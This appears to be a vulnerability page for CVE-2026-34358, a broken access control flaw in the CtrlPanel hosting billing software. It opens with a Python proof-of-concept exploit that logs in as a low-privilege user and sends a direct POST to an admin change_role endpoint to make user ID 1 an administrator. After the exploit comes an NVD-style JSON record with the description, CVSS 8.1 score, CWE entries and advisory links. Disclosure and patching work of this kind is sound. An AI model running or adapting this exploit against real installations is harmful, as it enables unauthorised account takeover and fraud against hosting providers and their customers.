CVE-2026-34358

import requests # Target configuration target_url = "https://example.com" login_endpoint = f"{target_url}/login" exploit_endpoint = f"{target_url}/admin/users/1/change_role" # Targeting user ID 1 # Attacker credentials (low privilege) payload_login = { "email": "[email protected]", "password": "attacker_password" } # Payload to escalate privileges payload_exploit = { "role": "admin" } session = requests.Session() # 1. Authenticate as a regular user print("[*] Attempting to login...") response = session.post(login_endpoint, data=payload_login) if response.status_code == 200: print("[+] Login successful.") # 2. Exploit Broken Access Control on update() method # The vulnerability allows skipping permission checks on write operations print("[*] Sending privilege escalation request...") exploit_response = session.post(exploit_endpoint, data=payload_exploit) if exploit_response.status_code == 200: print("[+] Exploit successful! User ID 1 is now an admin.") else: print(f"[-] Exploit failed. Status: {exploit_response.status_code}") else: print("[-] Login failed.")

{"cve": {"id": "CVE-2026-34358", "sourceIdentifier": "[email protected]", "published": "2026-05-19T22:16:37.637", "lastModified": "2026-05-20T16:16:25.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CtrlPanel is open-source billing software for hosting providers. Versions 1.1.1 and prior contains a broken access control vulnerability where multiple admin controllers enforce permission checks on form display methods but omit equivalent checks on the corresponding write methods, allowing any authenticated user to bypass RBAC via direct POST/PATCH requests. Controllers missing checks on write methods store() and update() include ApplicationApiController (admin.api.write), CouponController (admin.coupons.write), PartnerController (admin.partners.write), ShopProductController (admin.store.write), UsefulLinkController (admin.useful_links.write), and VoucherController (admin.voucher.write); ProductController (admin.products.edit), ServerController (write/change_owner/change_identifier), and UserController (write/change_email/change_credits/change_username/change_password/change_role/change_referral/change_ptero/change_serverlimit) are missing checks on update() only, and ActivityLogController exposed empty stub store()/update() methods that silently accepted any request. An authenticated attacker without admin write privileges can issue API credentials, generate unlimited coupons and vouchers, assign arbitrary partner commission and discount rates, alter shop product pricing and limits, reassign server ownership or identifiers, and modify user accounts including roles, credits, passwords, and linked Pterodactyl IDs to achieve full privilege escalation, as well as abuse logBackIn() without the login_as permission to interfere with admin impersonation sessions. This issue has been fixed in version 1.2.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://github.com/Ctrlpanel-gg/panel/releases/tag/1.2.0", "source": "[email protected]"}, {"url": "https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-pxmw-gj52-9p68", "source": "[email protected]"}, {"url": "https://github.com/Ctrlpanel-gg/panel/security/advisories/GHSA-pxmw-gj52-9p68", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}